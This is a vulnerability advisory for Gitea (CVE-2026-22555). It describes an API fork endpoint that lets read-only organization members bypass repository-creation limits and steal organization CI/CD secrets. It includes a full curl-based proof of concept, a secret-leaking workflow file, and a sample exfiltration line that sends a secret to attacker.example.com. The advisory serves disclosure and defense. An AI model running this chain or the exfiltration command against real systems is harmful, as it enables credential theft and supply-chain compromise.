PT-2026-50583 · Go · Code.Gitea.Io/Gitea

Published

2026-06-17

·

Updated

2026-06-17

·

CVE-2026-22555

CVSS v3.1

8.1

High

VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Summary

The API endpoint POST /api/v1/repos/{owner}/{repo}/forks only checks IsOrgMember() when a user forks a repository into an organization, but does not check CanCreateOrgRepo(). The web UI fork handler correctly checks both. This allows a read-only organization member — in a team with can create org repo=false — to create repositories in the organization namespace via the API. The attacker receives full admin permissions on the forked repository, can enable Actions, push arbitrary workflow files, and exfiltrate all organization-level CI/CD secrets (deploy keys, cloud credentials, API tokens) through the runner infrastructure.

Steps To Reproduce

1. Environment setup

Start a Gitea instance with Actions enabled:
bash
# docker-compose.yml
cat > docker-compose.yml << 'EOF'
version: '3'
services:
 gitea:
  image: gitea/gitea:1.23
  container name: gitea-poc
  ports:
   - "3000:3000"
  volumes:
   - gitea-data:/data
  environment:
   - GITEA database DB TYPE=sqlite3
   - GITEA server ROOT URL=http://localhost:3000/
   - GITEA security INSTALL LOCK=true
   - GITEA actions ENABLED=true
volumes:
 gitea-data:
EOF

docker compose up -d
# Wait for startup
sleep 15

# Create admin user
docker exec -u git gitea-poc gitea admin user create 
 --admin --username admin --password 'Admin1234!' 
 --email admin@example.com --must-change-password=false

2. Create the target environment (as admin)

bash
# Get admin token
ADMIN TOKEN=$(curl -s -X POST "http://localhost:3000/api/v1/users/admin/tokens" 
 -u "admin:Admin1234!" -H "Content-Type: application/json" 
 -d '{"name": "setup", "scopes": ["all"]}' | python3 -c "import sys,json; print(json.load(sys.stdin)['sha1'])")

# Create attacker user
curl -s -X POST "http://localhost:3000/api/v1/admin/users" 
 -H "Authorization: token $ADMIN TOKEN" -H "Content-Type: application/json" 
 -d '{"username":"attacker","password":"Attacker123!","email":"attacker@example.com","must change password":false}'

# Create organization
curl -s -X POST "http://localhost:3000/api/v1/orgs" 
 -H "Authorization: token $ADMIN TOKEN" -H "Content-Type: application/json" 
 -d '{"username":"target-org","visibility":"public"}'

# Create a source repository in the org
curl -s -X POST "http://localhost:3000/api/v1/orgs/target-org/repos" 
 -H "Authorization: token $ADMIN TOKEN" -H "Content-Type: application/json" 
 -d '{"name":"source-repo","auto init":true}'

# Create a read-only team with can create org repo=false
TEAM ID=$(curl -s -X POST "http://localhost:3000/api/v1/orgs/target-org/teams" 
 -H "Authorization: token $ADMIN TOKEN" -H "Content-Type: application/json" 
 -d '{"name":"readonly-team","permission":"read","can create org repo":false,"units":["repo.code","repo.issues"]}' 
 | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")

# Add attacker to the read-only team
curl -s -X PUT "http://localhost:3000/api/v1/teams/$TEAM ID/members/attacker" 
 -H "Authorization: token $ADMIN TOKEN"

# Add source-repo to the team so attacker can read it
curl -s -X PUT "http://localhost:3000/api/v1/teams/$TEAM ID/repos/target-org/source-repo" 
 -H "Authorization: token $ADMIN TOKEN"

# Create organization secrets (simulating real CI/CD credentials)
curl -s -X PUT "http://localhost:3000/api/v1/orgs/target-org/actions/secrets/DEPLOY KEY" 
 -H "Authorization: token $ADMIN TOKEN" -H "Content-Type: application/json" 
 -d '{"data":"sk-live-test-deploy-key-1234567890abcd"}'

curl -s -X PUT "http://localhost:3000/api/v1/orgs/target-org/actions/secrets/AWS ACCESS KEY" 
 -H "Authorization: token $ADMIN TOKEN" -H "Content-Type: application/json" 
 -d '{"data":"AKIAIOSFODNN7EXAMPLE"}'

curl -s -X PUT "http://localhost:3000/api/v1/orgs/target-org/actions/secrets/AWS SECRET KEY" 
 -H "Authorization: token $ADMIN TOKEN" -H "Content-Type: application/json" 
 -d '{"data":"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}'

3. Register an Actions runner

bash
# Get runner registration token
REG TOKEN=$(docker exec -u git gitea-poc gitea actions generate-runner-token)

# Start act runner (adjust network name if needed)
NETWORK=$(docker inspect gitea-poc --format '{{range $key, $val := .NetworkSettings.Networks}}{{$key}}{{end}}')
docker run -d --name act-runner --network "$NETWORK" 
 -e GITEA INSTANCE URL=http://gitea-poc:3000 
 -e GITEA RUNNER REGISTRATION TOKEN="$REG TOKEN" 
 -e GITEA RUNNER LABELS=ubuntu-latest:docker://node:20-bookworm 
 -v /var/run/docker.sock:/var/run/docker.sock 
 gitea/act runner:latest

# Wait for runner registration
sleep 15

4. Verify attacker CANNOT create repos in the org (expected: 403)

bash
# Get attacker token
ATTACKER TOKEN=$(curl -s -X POST "http://localhost:3000/api/v1/users/attacker/tokens" 
 -u "attacker:Attacker123!" -H "Content-Type: application/json" 
 -d '{"name": "poc", "scopes": ["all"]}' | python3 -c "import sys,json; print(json.load(sys.stdin)['sha1'])")

# Try creating a repo directly — should fail
curl -s -o /dev/null -w "Direct repo creation: HTTP %{http code}
" 
 -X POST "http://localhost:3000/api/v1/orgs/target-org/repos" 
 -H "Authorization: token $ATTACKER TOKEN" -H "Content-Type: application/json" 
 -d '{"name":"should-fail","auto init":true}'
# Expected output: Direct repo creation: HTTP 403

# Verify attacker cannot access org secrets via API
curl -s -o /dev/null -w "Access org secrets: HTTP %{http code}
" 
 "http://localhost:3000/api/v1/orgs/target-org/actions/secrets" 
 -H "Authorization: token $ATTACKER TOKEN"
# Expected output: Access org secrets: HTTP 403

5. Exploit: Fork into the org via API (THE BYPASS)

bash
# Fork the source repo into the org — this should also fail but doesn't
FORK RESULT=$(curl -s -X POST 
 "http://localhost:3000/api/v1/repos/target-org/source-repo/forks" 
 -H "Authorization: token $ATTACKER TOKEN" -H "Content-Type: application/json" 
 -d '{"organization":"target-org","name":"evil-fork"}')

echo "$FORK RESULT" | python3 -c "
import sys,json
d = json.load(sys.stdin)
print(f'Fork created: {d["full name"]}')
print(f'Permissions: admin={d["permissions"]["admin"]}, push={d["permissions"]["push"]}')
"
# Expected output:
#  Fork created: target-org/evil-fork
#  Permissions: admin=True, push=True
The attacker now has admin+push access to an org-owned repository, despite being in a team with can create org repo=false.

6. Enable Actions and push exfiltration workflow

bash
# Enable Actions on the fork
curl -s -X PATCH "http://localhost:3000/api/v1/repos/target-org/evil-fork" 
 -H "Authorization: token $ATTACKER TOKEN" -H "Content-Type: application/json" 
 -d '{"has actions":true}'

# Push a workflow that references org secrets
WORKFLOW=$(cat << 'WFEOF'
name: exfiltrate
on: [push]
jobs:
 steal:
  runs-on: ubuntu-latest
  steps:
   - name: Leak org secrets
    env:
     DEPLOY KEY: ${{ secrets.DEPLOY KEY }}
     AWS ACCESS KEY: ${{ secrets.AWS ACCESS KEY }}
     AWS SECRET KEY: ${{ secrets.AWS SECRET KEY }}
    run: |
     echo "=== SECRET EXFILTRATION ==="
     echo "DEPLOY KEY length: ${#DEPLOY KEY}"
     echo "AWS ACCESS KEY length: ${#AWS ACCESS KEY}"
     echo "AWS SECRET KEY length: ${#AWS SECRET KEY}"
     echo "DEPLOY KEY prefix: ${DEPLOY KEY:0:4}..."
     echo "AWS ACCESS KEY prefix: ${AWS ACCESS KEY:0:4}..."
     echo "AWS SECRET KEY prefix: ${AWS SECRET KEY:0:4}..."
     echo "=== END EXFILTRATION ==="
WFEOF
)

curl -s -X POST 
 "http://localhost:3000/api/v1/repos/target-org/evil-fork/contents/.gitea/workflows/steal.yml" 
 -H "Authorization: token $ATTACKER TOKEN" -H "Content-Type: application/json" 
 -d "{"content":"$(echo -n "$WORKFLOW" | base64 -w0)","message":"add CI"}"

7. Verify secret exfiltration

bash
# Wait for the runner to execute the workflow (60-120 seconds)
sleep 90

# Check the Actions run page in browser or via API:
echo "View results at: http://localhost:3000/target-org/evil-fork/actions"
Expected output in the workflow logs:
=== SECRET EXFILTRATION ===
DEPLOY KEY length: 37
AWS ACCESS KEY length: 20
AWS SECRET KEY length: 40
DEPLOY KEY prefix: sk-l...
AWS ACCESS KEY prefix: AKIA...
AWS SECRET KEY prefix: wJal...
=== END EXFILTRATION ===
All three organization-level secrets are accessible to the attacker's workflow. In a real attack, the workflow would exfiltrate secrets to an attacker-controlled endpoint (e.g., curl -d "$SECRET" https://attacker.example.com/collect).

Impact

A read-only organization member — with no repository creation rights (can create org repo=false) — can exfiltrate all organization-level CI/CD secrets by exploiting a missing authorization check in the API fork endpoint. The web UI correctly enforces the CanCreateOrgRepo permission, but the API does not, creating a classic API-vs-web authorization inconsistency.
The attack chain is: (1) fork an existing org repo back into the same org via the API, bypassing the CanCreateOrgRepo check; (2) receive admin permissions on the fork as its creator; (3) enable Actions and push a workflow that references org secrets; (4) the org's runner picks up the job (runners match on repository.owner id), and org secrets are injected into the workflow environment (fetched by Repo.OwnerID); (5) the workflow exfiltrates all org secrets.
Organization secrets commonly include deploy keys, cloud credentials (AWS IAM keys, GCP service accounts), container registry tokens, and personal access tokens with broad scope. Stolen credentials enable lateral movement to cloud infrastructure, private repositories, and external services far beyond the Gitea instance itself. The attacker can also push arbitrary code under the organization's trusted namespace, creating supply chain risk for downstream consumers.
This is particularly dangerous because organizations commonly use read-only teams for auditors, reviewers, contractors, or new employees — precisely the users who should NOT have access to production secrets.

Supporting Material/References

Fix

Incorrect Authorization

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

CVE-2026-22555
GHSA-FHX7-M96W-MV29

Affected Products

Code.Gitea.Io/Gitea